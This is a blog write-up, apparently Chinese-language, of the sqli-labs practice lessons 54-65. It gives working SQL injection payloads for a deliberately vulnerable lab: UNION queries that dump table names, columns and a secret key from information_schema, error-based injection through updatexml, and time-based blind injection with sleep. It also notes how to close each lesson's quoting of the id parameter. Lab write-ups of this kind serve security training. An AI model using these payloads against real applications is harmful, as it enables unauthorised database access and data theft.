Loading

sqli-labs lesson 54-65

less 54

需要从数据库的CHALLENGES表中取出key值输入,输入对了才算通过,但是只能做10次尝试。

 

 这里id被单引号包裹,注意闭合单引号即可,剩下的就可以参照less 1获取表中信息即可

下面只列出来步骤截图:

执行:?id=0' union  select 1,2,3 --+

 

 执行:?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

 

 执行:?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='m9isrxrx2a' --+

 

执行:?id=0' union select 1,2,group_concat(concat_ws(0x7e,secret_0FMJ)) from m9isrxrx2a--+

 

 这个值就是最后的key值

 

less 55

与less 54唯一不同在于id包裹为(),且能尝试14次,其余和less 54一致

 

less 56

 

 id包裹为(‘’)注意闭合即可其他都一样

 

less 57

id值的左边需要用 " 进行闭合 其余地方都一样

 

less 58

区别在于这关需要用到报错注入且只能尝试5次,下面附上payload

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+

 

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='1o8ga4ar0s'),0x7e),1) --+

 

 ?id=1' and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,secret_PQVY)) from CHALLENGES.1o8ga4ar0s),0x7e),1) --+

 

 

 

 

 

less 59

id值没有被包裹 其余同less 58一样

 

less 60

id包裹为 ("")注意闭合即可,其余与less 58一样还是用报错注入

 

less 61

id包裹为(('')) 其余同less 58 用报错注入

 

less 62

id包裹为('') 注意闭合,这里限制次数变成了130次

说明盲注它lei了~....

用延时注入即可

下面给个payload  其余的根据以前的学习构造即可:

?id=1') and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)>'a',1,sleep(5)) #

判断该表的第一位字母是否大于a

 

less 63

id包裹为单引号  其余的与less 62 一样使用延时注入即可

 

less 64

id包裹为(()) 其余的与less 62一样 延时注入即可

 

less 65

id包裹为("") 其余的与less 62一样 延时注入即可

posted @ 2020-03-20 18:19  Zh1z3ven  阅读(139)  评论(0编辑  收藏  举报